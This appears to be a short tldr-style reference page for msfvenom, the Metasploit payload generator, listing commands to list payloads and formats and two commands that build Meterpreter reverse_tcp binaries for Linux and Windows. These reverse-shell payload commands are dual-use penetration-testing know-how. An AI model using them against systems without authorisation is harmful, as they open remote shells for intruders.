msfvenom

Manually generate payloads for metasploit. More information: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom. List payloads:…

msfvenom

Manually generate payloads for metasploit. More information: https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom.

msfvenom -l payloads

msfvenom -l formats

msfvenom -p {{payload}} --list-options

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f elf > {{path/to/binary}}

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} -f exe > {{path/to/binary.exe}}

Также может быть вам интересно:
КодТрюки BashНастройкиТерминал/Консоль
← mscore msmtp →